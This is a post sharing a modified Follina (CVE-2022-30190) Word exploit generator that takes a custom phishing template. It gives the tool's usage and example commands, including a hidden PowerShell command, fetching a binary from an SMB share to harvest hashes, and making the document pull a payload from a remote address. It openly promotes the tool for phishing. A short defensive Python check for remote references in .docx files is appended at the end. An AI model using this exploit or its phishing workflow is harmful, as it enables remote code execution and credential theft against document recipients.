[CVE-2022-30190] Follina, modified version: custom Word template edition
Author: Sec-Labs | Published:
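Project introduction
Modified from the project at https://github.com/chvancooten/follina.py
It lets you specify a custom docx template file, which is convenient for phishing in real engagements: edit your own phishing Word document, then pass it with the -f parameter.
Project URL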
https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed
Usage
usage: follina.py [-h] -m {binary,command} [-b BINARY] [-f FILE] [-c COMMAND] [-u URL] [-H HOST] [-P PORT]

optional arguments:
  -h, --help            show this help message and exit

Required Arguments:
  -m {binary,command}, --mode {binary,command}
                        Execution mode, can be "binary" to load a (remote) binary, or "command" to run an encoded PS command

Binary Execution Arguments:
  -b BINARY, --binary BINARY
                        The full path of the binary to run. Can be local or remote from an SMB share

Docx file Arguments:
  -f FILE, --file FILE  The docx file

Command Execution Arguments:
  -c COMMAND, --command COMMAND
                        The encoded command to execute in "command" mode

Optional Arguments:
  -u URL, --url URL     The hostname or IP address where the generated document should retrieve your payload, defaults to "localhost"
  -H HOST, --host HOST  The interface for the web server to listen on, defaults to all interfaces (0.0.0.0)
  -P PORT, --port PORT  The port to run the HTTP server on, defaults to 80
Examples
Default docx: muban.docx
# Execute a local binary
python .\follina.py -m binary -b \windows\system32\calc.exe
python .\follina.py -m binary -b \windows\system32\calc.exe -f muban2.docx
# On linux you may have to escape backslashes
python .\follina.py -m binary -b \\windows\\system32\\calc.exe
# Execute a binary from a file share (can be used to farm hashes 👀)
python .\follina.py -m binary -b \\localhost\c$\windows\system32\calc.exe
# Execute an arbitrary powershell command
python .\follina.py -m command -c "Start-Process c:\windows\system32\cmd.exe -WindowStyle hidden -ArgumentList '/c echo owned > c:\users\public\owned.txt'"
# Run the web server on the default interface (all interfaces, 0.0.0.0), but tell the malicious document to retrieve it at http://1.2.3.4/exploit.html
python .\follina.py -m binary -b \windows\system32\calc.exe -u 1.2.3.4
# Only run the webserver on localhost, on port 8080 instead of 80
python .\follina.py -m binary -b \windows\system32\calc.exe -H 127.0.0.1 -P 8080
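
A defender-side check for the behaviour the -u option describes, where the generated document retrieves its payload from a remote URL: list every external relationship inside a .docx and separate ordinary hyperlinks from the rest. This is an added example, not code from the project; the sample file is constructed, and the oleObject relationship type in it is an assumption about how such a document references the URL.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_TAG = "{http://schemas.openxmlformats.org/package/2006/relationships}Relationship"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
MAX_PART = 1 << 20  # skip implausibly large .rels parts (zip-bomb guard)

def external_targets(docx_bytes):
    """Return (part, relationship type, target) for every TargetMode="External" entry."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for info in z.infolist():
            if not info.filename.endswith(".rels") or info.file_size > MAX_PART:
                continue
            data = z.read(info)
            if b"<!DOCTYPE" in data:  # OOXML parts carry no DTD; do not parse one
                continue
            for rel in ET.fromstring(data).iter(REL_TAG):
                if rel.get("TargetMode", "").lower() == "external":
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    hits.append((info.filename, kind, rel.get("Target", "")))
    return hits

def triage(docx_bytes):
    """Separate clickable hyperlinks from references that are not user-clicked links."""
    hits = external_targets(docx_bytes)
    links = [h for h in hits if h[1].lower() == "hyperlink"]
    other = [h for h in hits if h[1].lower() != "hyperlink"]
    return other, links

def sample_docx():
    """Constructed sample: a zip holding only a .rels part, not a working document."""
    rels = (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}hyperlink" '
        'Target="https://example.com/" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}oleObject" '
        'Target="http://1.2.3.4/exploit.html" TargetMode="External"/>'
        f'<Relationship Id="rId3" Type="{OFFICE_REL}styles" Target="styles.xml"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()

if __name__ == "__main__":
    other, links = triage(sample_docx())
    for part, kind, target in other:
        print(f"REVIEW {part}: {kind} -> {target}")
```

Non-hyperlink external references in an inbound document are worth quarantining for review, since a template edited to look legitimate still has to carry the remote reference.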


Tags: tool sharing, phishing study